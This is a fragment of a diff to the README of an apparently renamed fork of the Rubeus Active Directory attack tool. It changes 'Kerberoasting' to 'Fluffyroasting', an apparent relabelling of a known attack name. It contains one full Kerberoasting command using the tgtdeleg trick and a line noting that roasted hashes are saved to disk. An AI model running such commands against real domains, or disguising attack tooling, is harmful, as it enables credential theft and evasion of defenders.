Team-Recon-Black-Ops/CrimsonRufus/README.md

     [*] Roasted hashes written to : C:\Temp\hashes.txt

-Perform Kerberoasting using the `tgtdeleg` trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:
+Perform Fluffyroasting using the `tgtdeleg` trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:

-    C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3
+    C:\Rubeus>Rubeus.exe fluffyroast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3

        ______        _
       (_____ \      | |